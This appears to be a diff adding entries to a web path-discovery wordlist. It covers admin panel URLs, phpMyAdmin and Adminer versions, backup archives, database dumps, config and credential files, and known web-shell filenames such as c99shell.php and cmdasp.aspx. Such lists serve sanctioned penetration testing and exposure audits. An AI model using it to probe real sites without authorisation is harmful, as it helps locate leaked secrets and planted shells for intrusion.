+admin/cp.html
+admin/cp.php
+admin/db/
+admin/default
+admin/default.asp
+admin/default/admin.asp
+admin/default/login.asp
+admin/download.php
+admin/dumper/
+admin/error.log
+admin/error.txt
+admin/error_log
+admin/export.php
+admin/FCKeditor
+admin/fckeditor/editor/filemanager/browser/default/connectors/asp/connector.asp
+admin/fckeditor/editor/filemanager/browser/default/connectors/aspx/connector.aspx
+admin/fckeditor/editor/filemanager/browser/default/connectors/php/connector.php
+admin/fckeditor/editor/filemanager/connectors/asp/connector.asp
+admin/fckeditor/editor/filemanager/connectors/asp/upload.asp
+admin/fckeditor/editor/filemanager/connectors/aspx/connector.aspx
+admin/fckeditor/editor/filemanager/connectors/aspx/upload.aspx
+admin/fckeditor/editor/filemanager/connectors/php/connector.php
+admin/fckeditor/editor/filemanager/connectors/php/upload.php
+admin/fckeditor/editor/filemanager/upload/asp/upload.asp
+admin/fckeditor/editor/filemanager/upload/aspx/upload.aspx
+admin/fckeditor/editor/filemanager/upload/php/upload.php
+admin/file.php
+admin/files.php
+admin/home
+admin/home.html
+admin/home.php
+admin/includes/configure.php~
+admin/index
+admin/index.asp
+admin/index.html
+admin/index.php
+admin/js/tiny_mce/
+admin/js/tinymce/
+admin/log
+admin/login
+admin/login.asp
+admin/login.htm
+admin/login.html
+admin/login.php
+admin/logon.jsp
+admin/logs/
+admin/logs/access-log
+admin/logs/access.log
+admin/logs/access_log
+admin/logs/err.log
+admin/logs/error-log
+admin/logs/error.log
+admin/logs/error_log
+admin/logs/login.txt
+admin/manage
+admin/manage.asp
+admin/manage/admin.asp
+admin/manage/login.asp
+admin/mysql/
+admin/mysql/index.php
+admin/mysql2/index.php
+admin/phpMyAdmin
+admin/phpmyadmin/
+admin/phpMyAdmin/
+admin/phpMyAdmin/index.php
+admin/phpmyadmin/index.php
+admin/phpmyadmin2/index.php
+admin/pMA/
+admin/pma/
+admin/pma/index.php
+admin/PMA/index.php
+admin/pol_log.txt
+admin/private/logs
+admin/secure/logon.jsp
+admin/sqladmin/
+admin/sxd/
+admin/sysadmin/
+admin/upload.php
+admin/uploads.php
+admin/user_count.txt
+admin/web/
+admin0
+admin1
+admin1.htm
+admin1.html
+admin1.php
+admin1/
+admin2
+admin2.asp
+admin2.html
+admin2.old/
+admin2.php
+admin2/
+admin2/index.php
+admin2/login.php
+admin3/
+admin4/
+admin4_account/
+admin4_colon/
+admin5/
+admin_
+admin_/
+admin_admin
+admin_area
+admin_area.php
+admin_area/
+admin_area/admin
+admin_area/admin.html
+admin_area/admin.php
+admin_area/index.html
+admin_area/index.php
+admin_area/login
+admin_area/login.html
+admin_area/login.php
+admin_files
+admin_index
+admin_index.asp
+admin_login
+admin_login.html
+admin_login.php
+admin_login/
+admin_login/admin.asp
+admin_login/login.asp
+admin_logon
+admin_logon/
+admin_main
+admin_pass
+admin_tools/
+adminarea/
+adminarea/admin.html
+adminarea/admin.php
+adminarea/index.html
+adminarea/index.php
+adminarea/login.html
+adminarea/login.php
+adminconsole
+admincontrol
+admincontrol.html
+admincontrol.php
+admincontrol/
+admincontrol/login.html
+admincontrol/login.php
+admincp/
+admincp/index.asp
+admincp/index.html
+admincp/js/kindeditor/
+admincp/login
+admincp/login.asp
+admincp/upload/
+adminedit
+adminer-4.0.0-en.php
+adminer-4.0.0-mysql-en.php
+adminer-4.0.0-mysql.php
+adminer-4.0.0.php
+adminer-4.0.1-en.php
+adminer-4.0.1-mysql-en.php
+adminer-4.0.1-mysql.php
+adminer-4.0.1.php
+adminer-4.0.2-en.php
+adminer-4.0.2-mysql-en.php
+adminer-4.0.2-mysql.php
+adminer-4.0.2.php
+adminer-4.0.3-en.php
+adminer-4.0.3-mysql-en.php
+adminer-4.0.3-mysql.php
+adminer-4.0.3.php
+adminer-4.1.0-en.php
+adminer-4.1.0-mysql-en.php
+adminer-4.1.0-mysql.php
+adminer-4.1.0.php
+adminer-4.2.0-en.php
+adminer-4.2.0-mysql-en.php
+adminer-4.2.0-mysql.php
+adminer-4.2.0.php
+adminer-4.2.1-en.php
+adminer-4.2.1-mysql-en.php
+adminer-4.2.1-mysql.php
+adminer-4.2.1.php
+adminer-4.2.2-en.php
+adminer-4.2.2-mysql-en.php
+adminer-4.2.2-mysql.php
+adminer-4.2.2.php
+adminer-4.2.3-en.php
+adminer-4.2.3-mysql-en.php
+adminer-4.2.3-mysql.php
+adminer-4.2.3.php
+adminer-4.2.4-en.php
+adminer-4.2.4-mysql-en.php
+adminer-4.2.4-mysql.php
+adminer-4.2.4.php
+adminer-4.2.5-en.php
+adminer-4.2.5-mysql-en.php
+adminer-4.2.5-mysql.php
+adminer-4.2.5.php
+adminer-4.3.0-en.php
+adminer-4.3.0-mysql-en.php
+adminer-4.3.0-mysql.php
+adminer-4.3.0.php
+adminer-4.3.1-en.php
+adminer-4.3.1-mysql-en.php
+adminer-4.3.1-mysql.php
+adminer-4.3.1.php
+adminer-4.4.0-en.php
+adminer-4.4.0-mysql-en.php
+adminer-4.4.0-mysql.php
+adminer-4.4.0.php
+adminer-4.5.0-en.php
+adminer-4.5.0-mysql-en.php
+adminer-4.5.0-mysql.php
+adminer-4.5.0.php
+adminer-4.6.0-en.php
+adminer-4.6.0-mysql-en.php
+adminer-4.6.0-mysql.php
+adminer-4.6.0.php
+adminer-4.6.1-en.php
+adminer-4.6.1-mysql-en.php
+adminer-4.6.1-mysql.php
+adminer-4.6.1.php
+adminer-4.6.2-en.php
+adminer-4.6.2-mysql-en.php
+adminer-4.6.2-mysql.php
+adminer-4.6.2.php
+adminer-4.6.3-en.php
+adminer-4.6.3-mysql-en.php
+adminer-4.6.3-mysql.php
+adminer-4.6.3.php
+adminer-4.7.0-en.php
+adminer-4.7.0-mysql-en.php
+adminer-4.7.0-mysql.php
+adminer-4.7.0.php
+adminer-4.7.1-en.php
+adminer-4.7.1-mysql-en.php
+adminer-4.7.1-mysql.php
+adminer-4.7.1.php
+adminer-4.7.2-en.php
+adminer-4.7.2-mysql-en.php
+adminer-4.7.2-mysql.php
+adminer-4.7.2.php
+adminer-4.7.3-en.php
+adminer-4.7.3-mysql-en.php
+adminer-4.7.3-mysql.php
+adminer-4.7.3.php
+adminer-4.7.4-en.php
+adminer-4.7.4-mysql-en.php
+adminer-4.7.4-mysql.php
+adminer-4.7.4.php
+adminer-4.7.5-en.php
+adminer-4.7.5-mysql-en.php
+adminer-4.7.5-mysql.php
+adminer-4.7.5.php
+adminer-4.7.6-en.php
+adminer-4.7.6-mysql-en.php
+adminer-4.7.6-mysql.php
+adminer-4.7.6.php
+adminer-4.7.7-en.php
+adminer-4.7.7-mysql-en.php
+adminer-4.7.7-mysql.php
+adminer-4.7.7.php
+adminer-4.7.8-en.php
+adminer-4.7.8-mysql-en.php
+adminer-4.7.8-mysql.php
+adminer-4.7.8.php
+adminer-4.7.9-en.php
+adminer-4.7.9-mysql-en.php
+adminer-4.7.9-mysql.php
+adminer-4.7.9.php
+adminer-4.8.0-en.php
+adminer-4.8.0-mysql-en.php
+adminer-4.8.0-mysql.php
+adminer-4.8.0.php
+adminer-4.8.1-en.php
+adminer-4.8.1-mysql-en.php
+adminer-4.8.1-mysql.php
+adminer-4.8.1.php
+adminer.php
+adminer/
+adminer/adminer.php
+adminer_coverage.ser
+adminis.php
+administer/
+administr8
+administr8.php
+administr8/
+administracao.php
+administracion.php
+administracion/
+administrador/
+administrateur.php
+administrateur/
+administratie/
+administration
+administration.php
+administration/
+administration/Sym.php
+administrative/
+administrative/login_history
+administrator
+administrator-login/
+administrator.html
+administrator.php
+administrator/
+administrator/.htaccess
+administrator/account
+administrator/account.html
+administrator/account.php
+administrator/admin.asp
+administrator/admin/
+administrator/cache/
+administrator/db/
+administrator/includes/
+administrator/index.html
+administrator/index.php
+administrator/login
+administrator/login.asp
+administrator/login.html
+administrator/login.php
+administrator/logs
+administrator/logs/
+administrator/phpmyadmin/
+administrator/phpMyAdmin/
+administrator/PMA/
+administrator/pma/
+administrator/web/
+administratoraccounts/
+administratorlogin
+administratorlogin.php
+administratorlogin/
+administrators
+administrators.php
+administrators.pwd
+administrators/
+administrivia/
+adminitem
+adminitem/
+adminitems
+adminitems.php
+adminitems/
+adminlogin
+adminLogin.html
+adminLogin.php
+adminlogin.php
+adminLogin/
+adminlogon/
+adminpanel
+adminpanel.html
+adminpanel.php
+adminpanel/
+adminpro/
+admins
+admins.asp
+admins.php
+admins/
+admins/backup/
+admins/log.txt
+adminsite/
+AdminTools/
+adminuser
+admission_controller_config.yaml
+admloginuser.php
+admpar/
+admpar/.ftppass
+admrev/
+admrev/.ftppass
+admrev/_files/
+affiliate
+affiliate.php
+affiliates.sql
+ak47.php
+akeeba.backend.log
+all/
+all/modules/ogdi_field/plugins/dataTables/extras/TableTools/media/swf/ZeroClipboard.swf
+amad.php
+amministratore.php
+analog.html
+anchor/errors.log
+ansible/
+answers/
+answers/error_log
+apache/
+apache/logs/access.log
+apache/logs/access_log
+apache/logs/error.log
+apache/logs/error_log
+apc-nrp.php
+apc.php
+apc/
+apc/apc.php
+apc/index.php
+api
+api-doc
+api-docs
+api.log
+api.php
+api.py
+api.tar.gz
+api.tgz
+api.zip
+api/
+api/2/explore/
+api/error_log
+api/graphiql
+api/graphql
+api/jsonws
+api/login.json
+api/package_search/v4/documentation
+api/swagger
+api/swagger-ui.html
+api/swagger.yml
+api/v1
+api/v1/graphiql
+api/v1/graphql
+api/v1/playground
+api/v2
+api/v2/graphiql
+api/v2/graphql
+api/v2/playground
+api/v3
+api/v3/graphiql
+api/v3/graphql
+api/v3/playground
+api_log.txt
+apibuild.pyc
+apidoc
+apidocs
+apiserver-aggregator-ca.cert
+apiserver-aggregator.cert
+apiserver-aggregator.key
+apiserver-client.crt
+apiserver-key.pem
+app-service.yaml
+app.config
+app.config.env
+app.env
+app.js
+app.php
+app.yaml
+app.zip
+app/
+app/.htaccess
+app/__pycache__/
+app/bin
+app/bootstrap.php.cache
+app/cache/
+app/composer.json
+app/composer.lock
+app/config/adminConf.json
+app/Config/core.php
+app/Config/database.php
+app/config/database.yml
+app/config/database.yml.pgsql
+app/config/database.yml.sqlite3
+app/config/database.yml_original
+app/config/database.yml~
+app/config/databases.yml
+app/config/global.json
+app/config/parameters.ini
+app/config/parameters.yml
+app/config/routes.cfg
+app/config/schema.yml
+app/dev
+app/docs
+app/etc/config.xml
+app/etc/enterprise.xml
+app/etc/fpc.xml
+app/etc/local.additional
+app/etc/local.xml
+app/etc/local.xml.additional
+app/etc/local.xml.bak
+app/etc/local.xml.live
+app/etc/local.xml.localRemote
+app/etc/local.xml.phpunit
+app/etc/local.xml.template
+app/etc/local.xml.vmachine
+app/etc/local.xml.vmachine.rm
+app/languages
+app/log/
+app/logs/
+app/phpunit.xml
+app/src
+app/storage/
+app/sys
+app/testing
+app/tmp/
+app/unschedule.bat
+app/vendor
+app/vendor-
+app/vendor-src
+app_dev.php
+appcache.manifest
+appengine-generated/
+applet
+application
+application.log
+application.wadl
+application/
+application/cache/
+application/configs/application.ini
+application/logs/
+apply.cgi
+AppPackages/
+apps/
+apps/__pycache__/
+apps/frontend/config/app.yml
+apps/frontend/config/databases.yml
+appveyor.yml
+Aptfile
+ar-lib
+archaius
+archaius.json
+archive.7z
+archive.rar
+archive.sql
+archive.tar
+archive.tar.gz
+archive.tgz
+archive.zip
+article/
+article/admin
+article/admin/admin.asp
+artifactory/
+artifacts/
+ASALocalRun/
+asd.php
+asp.aspx
+aspnet_client/
+aspnet_webadmin
+aspwpadmin
+aspxspy.aspx
+asset..
+assets/
+assets/fckeditor
+assets/js/fckeditor
+assets/npm-debug.log
+assets/pubspec.yaml
+asterisk.log
+asterisk/
+AT-admin.cgi
+atlassian-ide-plugin.xml
+audit.log
+auditevents
+auditevents.json
+auth
+auth.inc
+auth.php
+auth.tar.gz
+auth.zip
+auth_user_file.txt
+authadmin
+authadmin.php
+authadmin/
+authenticate
+authenticate.php
+authentication
+authentication.php
+authlog.txt
+authorization.config
+authorize.php
+authorized_keys
+authorizenet.log
+authuser
+authuser.php
+auto/
+autoconfig
+autoconfig.json
+autodiscover/
+autologin
+autologin.php
+autologin/
+autom4te.cache
+autoscan.log
+AutoTest.Net/
+autoupdate/
+av/
+aws/
+awstats
+awstats.conf
+awstats.pl
+awstats/
+axis/
+axis//happyaxis.jsp
+axis2-web//HappyAxis.jsp
+axis2/
+axis2//axis2-web/HappyAxis.jsp
+axis2/axis2-web/HappyAxis.jsp
+azure-pipelines.yml
+azureadmin/
+b2badmin/
+babel.config.js
+back.sql
+back_office.php
+backoffice.php
+backoffice/
+backoffice/v1/ui
+backup
+backup-2022.zip
+backup-2023.zip
+backup-2024.zip
+backup.7z
+backup.cfg
+backup.htpasswd
+backup.inc
+backup.inc.old
+backup.old
+backup.rar
+backup.sql
+backup.sql.old
+backup.tar
+backup.tar.bz2
+backup.tar.gz
+backup.tgz
+backup.zip
+Backup/
+backup/
+backup0/
+backup1/
+backup123/
+backup2/
+backup2022.zip
+backup2023.zip
+backup2024.zip
+backups
+backups.7z
+backups.inc
+backups.inc.old
+backups.old
+backups.rar
+backups.sql
+backups.sql.old
+backups.tar
+backups.tar.bz2
+backups.tar.gz
+backups.tgz
+backups.zip
+backups/
+bak/
+bamb/
+bamboo/
+banner.swf
+banneradmin/
+base/
+basic_auth.csv
+bb-admin/
+bb-admin/admin
+bb-admin/admin.html
+bb-admin/admin.php
+bb-admin/index.html
+bb-admin/index.php
+bb-admin/login
+bb-admin/login.html
+bb-admin/login.php
+bbadmin/
+bbs/
+bbs/admin/login
+bbs/admin_index.asp
+bea_wls_cluster_internal/
+bea_wls_deployment_internal/
+bea_wls_deployment_internal/DeploymentService
+bea_wls_diagnostics/
+bea_wls_internal/
+beans
+beans.json
+behat.yml
+BenchmarkDotNet.Artifacts/
+Berksfile
+beta
+beta.zip
+bigadmin/
+bigdump.php
+billing
+billing/
+billing/killer.php
+bin-debug/
+bin-release/
+bin/
+bin/config.sh
+bin/hostname
+bin/libs
+bin/reset-db-prod.sh
+bin/reset-db.sh
+bin/RhoBundle
+bin/target
+bin/tmp
+Binaries/
+bitbucket-pipelines.yml
+bitrix/
+bitrix/.settings
+bitrix/.settings.bak
+bitrix/.settings.php
+bitrix/.settings.php.bak
+bitrix/admin/help.php
+bitrix/admin/index.php
+bitrix/admin/site_checker.php
+bitrix/authorization.config
+bitrix/backup/
+bitrix/cache
+bitrix/cache_image
+bitrix/components/bitrix/desktop/admin_settings.php
+bitrix/components/bitrix/map.yandex.search/settings/settings.php
+bitrix/components/bitrix/player/player_playlist_edit.php
+bitrix/components/bitrix/sender.mail.editor/ajax.php
+bitrix/dumper/
+bitrix/error.log
+bitrix/import/
+bitrix/import/files
+bitrix/import/import
+bitrix/import/m_import
+bitrix/license_key.php
+bitrix/logs/
+bitrix/managed_cache
+bitrix/modules
+bitrix/modules/error.log
+bitrix/modules/error.log.old
+bitrix/modules/main/admin/restore.php
+bitrix/modules/main/classes/mysql/agent.php
+bitrix/modules/main/include/virtual_file_system.php
+bitrix/modules/serverfilelog-0.dat
+bitrix/modules/serverfilelog-1.dat
+bitrix/modules/serverfilelog_tmp.dat
+bitrix/modules/smtpd.log
+bitrix/modules/updater.log
+bitrix/modules/updater_partner.log
+bitrix/otp/
+bitrix/php_interface/dbconn.php
+bitrix/php_interface/dbconn.php2
+bitrix/settings
+bitrix/settings.bak
+bitrix/settings.php
+bitrix/settings.php.bak
+bitrix/stack_cache
+bitrix/tools/autosave.php
+bitrix/tools/get_catalog_menu.php
+bitrix/tools/html_editor_action.php
+bitrix/tools/mail_entry.php
+bitrix/tools/upload.php
+bitrix/tools/vote/uf.php
+bitrix/web.config
+bitrix_server_test.log
+bitrix_server_test.php
+bitrixsetup.php
+biy/
+biy/upload/
+Black.php
+blacklist.dat
+bld/
+blib/
+blockchain.json
+blog/
+blog/error_log
+blog/wp-content/backup-db/
+blog/wp-content/backups/
+blog/wp-login
+blog/wp-login.php
+blogindex/
+bookContent.swf
+boot.php
+bootstrap/data
+bootstrap/tmp
+bot.txt
+bower.json
+bower_components
+bower_components/
+box.json
+Brocfile.coffee
+Brocfile.js
+browser/
+brunch-config.coffee
+brunch-config.js
+bsmdashboards/messagebroker/amfsecure
+buck.sql
+buffer.conf
+bugs
+build
+Build
+build-iPhoneOS/
+build-iPhoneSimulator/
+Build.bat
+build.local.xml
+build.log
+build.properties
+build.sh
+build.xml
+build/
+build/build.properties
+build/buildinfo.properties
+build/reference/web-api/explore
+build/Release
+build_config_private.ini
+build_isolated/
+buildNumber.properties
+BundleArtifacts/
+bx_1c_import.php
+c-h.v2.php
+c100.php
+c22.php
+c99.php
+c99shell.php
+ca.crt
+ca.kru
+cabal-dev
+cabal.project.local
+cabal.project.local~
+cabal.sandbox.config
+cache
+cache-downloads
+cache/
+cache/sql_error_latest.cgi
+cachemgr.cgi
+caches
+cadmins/
+Cakefile
+Capfile
+capistrano/
+captures/
+Cargo.lock
+Carthage/Build
+cassandra/
+catalog.wci
+CATKIN_IGNORE
+cbx-portal/
+cbx-portal/js/zeroclipboard/ZeroClipboard.swf
+cc-errors.txt
+cc-log.txt
+ccbill.log
+ccp14admin/
+celerybeat-schedule
+cell.xml
+centreon/
+cert/
+certenroll/
+certprov/
+certsrv/
+cfexec.cfm
+cfg/
+cfg/cpp/
+CFIDE/
+CFIDE/administrator/
+cgi-bin/
+cgi-bin/awstats.pl
+cgi-bin/logi.php
+cgi-bin/login
+cgi-bin/login.cgi
+cgi-bin/php.ini
+cgi-bin/printenv.pl
+cgi-bin/test-cgi
+cgi-bin/test.cgi
+cgi-bin/ViewLog.asp
+cgi-sys/
+cgi-sys/realsignup.cgi
+cgi.pl/
+cgi/
+cgi/common.cg
+cgi/common.cgi
+Cgishell.pl
+change.log
+changeall.php
+ChangeLog
+CHANGELOG
+changelog
+Changelog
+ChangeLog.html
+changelog.html
+CHANGELOG.HTML
+CHANGELOG.html
+Changelog.html
+CHANGELOG.md
+Changelog.md
+CHANGELOG.MD
+changelog.md
+ChangeLog.md
+changelog.txt
+Changelog.txt
+ChangeLog.txt
+CHANGELOG.txt
+CHANGELOG.TXT
+CHANGES.html
+CHANGES.md
+changes.txt
+check
+check.php
+checkadmin
+checkadmin.php
+checked_accounts.txt
+checklogin
+checklogin.php
+checkouts/
+checkstyle/
+checkuser
+checkuser.php
+chef/
+Cheffile
+chefignore
+chkadmin
+chklogin
+chubb.xml
+ci/
+cidr.txt
+circle.yml
+Citrix/
+citrix/
+Citrix/PNAgent/config.xml
+citydesk.xml
+ckeditor
+ckeditor/
+ckeditor/ckfinder/ckfinder.html
+ckeditor/ckfinder/core/connector/asp/connector.asp
+ckeditor/ckfinder/core/connector/aspx/connector.aspx
+ckeditor/ckfinder/core/connector/php/connector.php
+ckfinder/
+ckfinder/ckfinder.html
+claroline/phpMyAdmin/index.php
+classes/
+classes/cookie.txt
+classes_gen
+classic.json
+classic.jsonp
+cleanup.log
+cli/
+client.ovpn
+client_.ovpn
+client_secret.json
+client_secrets.json
+ClientAccessPolicy.xml
+ClientBin/
+cliente/
+cliente/downloads/h4xor.php
+clients.mdb
+clients.sql
+clients.sqlite
+clients.tar.gz
+clients.zip
+cloud-config.yml
+cloud/
+cmake_install.cmake
+CMakeCache.txt
+CMakeFiles
+CMakeLists.txt
+CMakeLists.txt.user
+CMakeScripts
+cmd-asp-5.1.asp
+cmdasp.asp
+cmdasp.aspx
+cmdjsp.jsp
+cms-admin
+cms.csproj
+cms/
+cms/cms.csproj
+cms/Web.config
+cmsadmin
+cmsadmin.php
+cmsadmin/
+cmscockpit/
+cni-conf.json
+code.zip
+codeception.yml
+codeship/
+collectd/
+collectl/
+com.tar.gz
+com.zip
+command.php
+common.inc
+common.xml
+common/
+common/config/api.ini
+common/config/db.ini
+compass.rb
+compile
+compile_commands.json
+components/
+composer-bx.json
+composer.json
+composer.lock
+composer.phar
+composer/installed.json
+conditions
+conf
+conf/
+conf/Catalina
+conf/catalina.policy
+conf/catalina.properties
+conf/context.xml
+conf/logging.properties
+conf/server.xml
+conf/tomcat-users.xml
+conf/tomcat8.conf
+conf/web.xml
+config
+config.bak
+config.codekit
+config.codekit3
+config.core
+config.dat
+config.env
+config.guess
+config.h.in
+config.hash
+config.inc
+config.inc.bak
+config.inc.old
+config.inc.php
+config.inc.php.txt
+config.inc.php~
+config.inc.txt
+config.inc~
+config.ini
+config.ini.bak
+config.ini.old
+config.ini.txt
+config.json
+config.json.cfm
+config.local
+config.local.php_old
+config.local.php~
+config.old
+config.php
+config.php-eb
+config.php.bak
+config.php.bkp
+config.php.dist
+config.php.inc
+config.php.inc~
+config.php.new
+config.php.old
+config.php.save
+config.php.swp
+config.php.txt
+config.php.zip
+config.php~
+config.rb
+config.ru
+config.source
+config.sub
+config.txt
+config.xml
+config.yml
+config.zip
+Config/
+config/
+config/apc.php
+config/app.php
+config/app.yml
+config/AppData.config
+config/autoload/
+config/aws.yml
+config/banned_words.txt
+config/config.inc
+config/config.ini
+config/database.yml
+config/database.yml.pgsql
+config/database.yml.sqlite3
+config/database.yml_original
+config/database.yml~
+config/databases.yml
+config/db.inc
+config/development/
+config/initializers/secret_token.rb
+config/master.key
+config/monkcheckout.ini
+config/monkdonate.ini
+config/monkid.ini
+config/producao.ini
+config/routes.yml
+config/settings.inc
+config/settings.ini
+config/settings.ini.cfm
+config/settings.local.yml
+config/settings/production.yml
+config/site.php
+config/xml/
+config_override.php
+configprops
+configs.zip
+configs/
+Configs/authServerSettings.config
+configs/conf_bdd.ini
+configs/conf_zepass.ini
+Configs/Current/authServerSettings.config
+configuration.ini
+configuration.php
+configuration.php.bak
+configuration.php.dist
+configuration.php.old
+configuration.php.save
+configuration.php.swp
+configuration.php.txt
+configuration.php.zip
+configuration.php~
+configuration.zip
+configuration/
+configure
+configure.scan
+conflg.php
+confluence/
+conn.asp
+connect.inc
+connection.inc
+console
+console/
+console/base/config.json
+console/payments/config.json
+consul/
+containerLogs/
+content/
+content/debug.log
+contributing.md
+CONTRIBUTING.md
+contributors.txt
+control
+control.php
+control/
+controller.php
+controllers/
+controlpanel
+controlpanel.html
+controlpanel.php
+controlpanel/
+cookbooks
+cookie
+cookie.php
+COPYING
+COPYRIGHT.txt
+core.zip
+core/latest/swagger-ui/index.html
+count_admin
+cover
+cover_db/
+coverage
+coverage.data
+coverage.xml
+coverage/
+cp
+cp.html
+cp.php
+cp/
+cpanel
+Cpanel.php
+cpanel.php
+cpanel/
+cpanel_file/
+cpbackup-exclude.conf
+cpbt.php
+cpn.php
+craft/
+crash.log
+credentials
+credentials.csv
+credentials.json
+credentials.txt
+credentials.xml
+credentials/
+credentials/gcloud.json
+CREDITS
+crm/
+cron.log
+cron.php
+cron.sh
+cron/
+cron/cron.sh
+cron_import.log
+cron_sku.log
+crond/
+crond/logs/
+cronlog.txt
+cscockpit/
+csdp.cache
+csp/gateway/slc/api/swagger-ui.html
+css.php
+csx/
+CTestTestfile.cmake
+culeadora.txt
+custom/
+custom/db.ini
+customer_login/
+customers.csv
+customers.log
+customers.mdb
+customers.sql
+customers.sql.gz
+customers.sqlite
+customers.txt
+customers.xls
+CVS/
+cvs/
+CVS/Entries
+CVS/Root
+d.php
+d0main.php
+d0maine.php
+d0mains.php
+dam.php
+dat.tar.gz
+dat.zip
+data-nseries.tsv
+data.mdb
+data.sql
+data.sqlite
+data.tsv
+data.txt
+data/
+data/backups/
+data/cache/
+data/debug/
+data/DoctrineORMModule/cache/
+data/DoctrineORMModule/Proxy/
+data/files/
+data/logs/
+data/sessions/
+data/tmp/
+database
+database.csv
+database.inc
+database.log
+database.mdb
+database.php
+database.sql
+database.sqlite
+database.txt
+database.yml
+database.yml.pgsql
+database.yml.sqlite3
+database.yml_original
+database.yml~
+database.zip
+database/
+database/database/
+database/phpmyadmin/
+database/phpMyAdmin/
+database/phpMyAdmin2/
+database/phpmyadmin2/
+database_admin
+Database_Administration/
+Database_Backup/
+database_credentials.inc
+databases.yml
+databases.zip
+datadog/
+dataobject.ini
+davmail.log
+db
+DB
+db-admin
+db-admin/
+db-full.mysql
+db.csv
+db.inc
+db.ini
+db.log
+db.mdb
+Db.properties
+Db.script
+db.sql
+db.sqlite
+db.sqlite3
+db.xml
+db.yaml
+db.zip
+db/
+db/db-admin/
+db/dbadmin/
+db/dbweb/
+db/index.php
+db/main.mdb
+db/myadmin/
+db/phpMyAdmin-2/
+db/phpMyAdmin-3/
+db/phpMyAdmin/
+db/phpmyadmin/
+db/phpmyadmin2/
+db/phpMyAdmin2/
+db/phpmyadmin3/
+db/phpMyAdmin3/
+db/sql
+db/webadmin/
+db/webdb/
+db/websql/
+db1.mdb
+db1.sqlite
+db2
+db__.init.php
+db_admin
+db_backup.sql
+db_backups/
+db_session.init.php
+db_status.php
+dbaccess.log
+dbadmin.php
+dbadmin/
+dbadmin/index.php
+dbase
+dbase.sql
+dbbackup/
+dbdump.sql
+dbfix/
+dbweb/
+dead.letter
+DEADJOE
+debug
+debug-output.txt
+debug.inc
+debug.log
+debug.php
+debug.py
+debug.txt
+debug.xml
+debug/
+debug/pprof
+debug/routes
+debug_error.jsp
+delete.php
+demo
+demo.php
+demo/
+demo/ejb/index.html
+demo/ojspext/events/globals.jsa
+demo/sql/index.jsp
+demos/
+denglu
+denglu/
+denglu/admin.asp
+depcomp
+dependency-reduced-pom.xml
+deploy
+deploy.env
+deploy.rb
+deploy.sh
+deps
+deps/deps.jl
+DerivedData/
+DerivedDataCache/
+desk/
+Desktop.ini
+desktop/
+desktop/index_framed.htm
+dev
+dev.env
+dev.php
+dev.zip
+dev/
+devdata.db
+devel/
+devel_isolated/
+develop-eggs/
+development-parts/
+development.esproj/
+development.log
+development/
+deviceupdatefiles_ext/
+deviceupdatefiles_int/
+df_main.sql
+dfshealth.jsp
+dhcp_log/
+dialin/
+dir-login/
+dir.php
+directadmin/
+dist
+dist/
+dkms.conf
+dlldata.c
+dms/AggreSpy
+dms/DMSDump
+dns.alpha.kubernetes.io
+doc
+doc/
+doc/api/
+docker-compose-dev.yml
+docker-compose.yml
+docker/
+Dockerfile
+DocProject/buildhelp/
+DocProject/Help/html
+DocProject/Help/Html2
+docs
+docs.json
+docs/
+docs/_build/
+docs/api-docs.json
+doctrine/
+doctrine/schema/eirec.yml
+doctrine/schema/tmx.yml
+documentation
+documentation/
+documentation/config.yml
+dokuwiki/
+dom.php
+domcfg.nsf
+door.php
+dotenv.env
+down/
+down/login
+download/
+download/history.csv
+download/users.csv
+downloader/
+downloader/cache.cfg
+downloader/connect.cfg
+downloadFile.php
+downloads/
+downloads/dom.php
+dra.php
+dswsbobje/
+dswsbobje/happyaxis.jsp
+duckrails/mocks/
+dummy
+dummy.php
+dump
+dump.7z
+dump.html
+dump.inc
+dump.inc.old
+dump.json
+dump.log
+dump.old
+dump.rar
+dump.rdb
+dump.sh
+dump.sql
+dump.sql.old
+dump.sql.tgz
+dump.sqlite
+dump.tar
+dump.tar.bz2
+dump.tar.gz
+dump.tgz
+dump.txt
+dump.zip
+dump/
+dumper.php
+dumper/
+dumps/
+dwsync.xml
+dz.php
+dz0.php
+dz1.php
+eagle.epf
+ecf/
+ecosystem.json
+ecp/
+edit.php
+editor-4.0.0-en.php
+editor-4.0.0-mysql-en.php
+editor-4.0.0.php
+editor-4.0.1-en.php
+editor-4.0.1-mysql-en.php
+editor-4.0.1.php
+editor-4.0.2-en.php
+editor-4.0.2-mysql-en.php
+editor-4.0.2.php
+editor-4.0.3-en.php
+editor-4.0.3-mysql-en.php
+editor-4.0.3.php
+editor-4.1.0-en.php
+editor-4.1.0-mysql-en.php
+editor-4.1.0.php
+editor-4.2.0-en.php
+editor-4.2.0-mysql-en.php
+editor-4.2.0.php
+editor-4.2.1-en.php
+editor-4.2.1-mysql-en.php
+editor-4.2.1.php
+editor-4.2.2-en.php
+editor-4.2.2-mysql-en.php
+editor-4.2.2.php
+editor-4.2.3-en.php
+editor-4.2.3-mysql-en.php
+editor-4.2.3.php
+editor-4.2.4-en.php
+editor-4.2.4-mysql-en.php
+editor-4.2.4.php
+editor-4.2.5-en.php
+editor-4.2.5-mysql-en.php
+editor-4.2.5.php
+editor-4.3.0-en.php
+editor-4.3.0-mysql-en.php
+editor-4.3.0.php
+editor-4.3.1-en.php
+editor-4.3.1-mysql-en.php
+editor-4.3.1.php
+editor-4.4.0-en.php
+editor-4.4.0-mysql-en.php
+editor-4.4.0.php
+editor-4.5.0-en.php
+editor-4.5.0-mysql-en.php
+editor-4.5.0.php
+editor-4.6.0-en.php
+editor-4.6.0-mysql-en.php
+editor-4.6.0.php
+editor-4.6.1-en.php
+editor-4.6.1-mysql-en.php
+editor-4.6.1.php
+editor-4.6.2-en.php
+editor-4.6.2-mysql-en.php
+editor-4.6.2.php
+editor-4.6.3-en.php
+editor-4.6.3-mysql-en.php
+editor-4.6.3.php
+editor-4.7.0-en.php
+editor-4.7.0-mysql-en.php
+editor-4.7.0.php
+editor-4.7.1-en.php
+editor-4.7.1-mysql-en.php
+editor-4.7.1.php
+editor-4.7.2-en.php
+editor-4.7.2-mysql-en.php
+editor-4.7.2.php
+editor-4.7.3-en.php
+editor-4.7.3-mysql-en.php
+editor-4.7.3.php
+editor-4.7.4-en.php
+editor-4.7.4-mysql-en.php
+editor-4.7.4.php
+editor-4.7.5-en.php
+editor-4.7.5-mysql-en.php
+editor-4.7.5.php
+editor-4.7.6-en.php
+editor-4.7.6-mysql-en.php
+editor-4.7.6.php
+editor-4.7.7-en.php
+editor-4.7.7-mysql-en.php
+editor-4.7.7.php
+editor-4.7.8-en.php
+editor-4.7.8-mysql-en.php
+editor-4.7.8.php
+editor-4.7.9-en.php
+editor-4.7.9-mysql-en.php
+editor-4.7.9.php
